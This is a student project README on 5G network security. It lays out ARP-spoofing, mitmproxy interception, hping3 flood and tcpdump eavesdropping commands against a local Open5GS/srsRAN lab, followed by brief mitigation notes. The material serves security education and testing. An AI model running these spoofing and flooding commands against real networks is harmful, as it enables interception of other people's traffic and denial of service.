Skip to content

IIITV-5G-and-Edge-Computing-Activity/Gr08EC431_5G_NetworkSec_and_Vulnerability_Analysis

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

5G Security Threats: Identification, Simulation, and Mitigation 🔒📡

Welcome to the 5G Security Threats Mini Project, part of the IIITV 5G and Edge Computing Activity. This project delves into critical security challenges in 5G networks, showcasing simulations of attacks and implementing basic mitigation solutions.


About the IIITV 5G and Edge Computing Activity 👾📡

IIITV 5G and Edge Computing Activity is an open-source initiative by IIIT Vadodara to explore, innovate, and contribute to the domains of 5G technology and Edge Computing. It aims to foster a culture of collaboration and innovation while empowering students to engage with cutting-edge technologies.


Team Members

  • Aryan Amit Gupta (202151029)
  • Parth Soni (202151104)
  • Priyansh Vaishnav (202151120)

Scope of Work

Objective

This project explores security challenges in 5G networks, focusing on:

  1. Man-in-the-Middle (MitM) Attacks
  2. Distributed Denial of Service (DDoS) Attacks
  3. Eavesdropping Threats

Key Components

  1. Threat Identification
    Understanding the vulnerabilities and risks posed by the selected threats in 5G networks.

  2. Simulation of Attacks
    Using Open5GS and srsRAN, the project simulates these attacks to study their impact on:

    • The Core Network.
    • The Radio Access Network (RAN).
  3. Implementation of Mitigation Solutions
    Designing and implementing basic security solutions:

    • Encryption mechanisms for eavesdropping prevention.
    • Intrusion Detection Systems (IDS) for DDoS prevention.
    • Secure authentication for mitigating MitM attacks.
  4. Deliverables

    • A detailed analysis of threats.
    • Simulations demonstrating the impact and behavior of attacks.
    • Mitigation solutions with demonstrated effectiveness.
    • A comprehensive project report summarizing findings and recommendations.

Setup and Prerequisites

System Requirements

  • OS: Ubuntu 20.04 or later
  • Hardware: Minimum 8GB RAM and 50GB disk space
  • Networking Tools: tcpdump, Wireshark, mitmproxy, hping3, and arpspoof

Tools and Frameworks

  1. Open5GS: A 5G Core Network implementation.
  2. srsRAN: A software suite for simulating the UE and gNB.
  3. tcpdump: Packet capture tool.
  4. Wireshark: Traffic analysis.
  5. mitmproxy: For intercepting and manipulating HTTP traffic.
  6. hping3: For generating DDoS attack traffic.

Installation and Configuration

Open5GS Installation

sudo apt update
sudo apt install software-properties-common
sudo add-apt-repository ppa:open5gs/latest
sudo apt update
sudo apt install open5gs

srsRAN Installation

sudo add-apt-repository ppa:softwareradiosystems/srsran-project
sudo apt update
sudo apt install srsran-project -y

Simulated Attacks

1. Man-in-the-Middle (MitM) Attack

Intercept and manipulate communication between the UE and core network.

Steps

  1. Enable IP forwarding:
    sudo sysctl -w net.ipv4.ip_forward=1
  2. Redirect traffic using ARP spoofing:
    sudo arpspoof -i ogstun -t 10.45.0.2 10.45.0.1
    sudo arpspoof -i ogstun -t 10.45.0.1 10.45.0.2
  3. Intercept HTTP traffic using mitmproxy:
    mitmproxy -p 8080

2. Distributed Denial of Service (DDoS) Attack

Overload the UE or core network with traffic.

Steps

  1. Flood the UE with ICMP traffic:
    sudo hping3 -1 -i u1000 10.45.0.2
  2. Flood the core network with UDP packets:
    sudo hping3 -p 2152 --udp 10.45.0.1

3. Eavesdropping Attack

Capture unencrypted traffic using tcpdump or Wireshark.

Steps

  1. Start packet capture:
    sudo tcpdump -i ogstun -w capture.pcap
  2. Analyze packets using Wireshark:
    wireshark capture.pcap

Mitigation Solutions

Encryption

  • Use TLS for securing HTTP traffic.
  • Ensure end-to-end encryption between the UE and core network.

Intrusion Detection

  • Deploy an IDS (e.g., Suricata) to monitor and block suspicious traffic patterns.

Authentication

  • Implement mutual authentication with strong cryptographic mechanisms to prevent MitM.

Project Outcomes

  1. Analysis of Threats
    Detailed insights into the vulnerabilities exploited by MitM, DDoS, and Eavesdropping attacks.

  2. Simulated Scenarios
    Demonstrated the impact of attacks on 5G network components.

  3. Mitigation Strategies
    Designed and tested basic solutions to mitigate the identified threats.


How to Contribute

We welcome contributions to enhance this project. Feel free to submit pull requests or report issues. Together, we can advance the understanding and security of 5G networks!


License

This project is licensed under the MIT License.


Acknowledgments

Special thanks to IIIT Vadodara for fostering a collaborative and innovative environment for exploring cutting-edge technologies.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published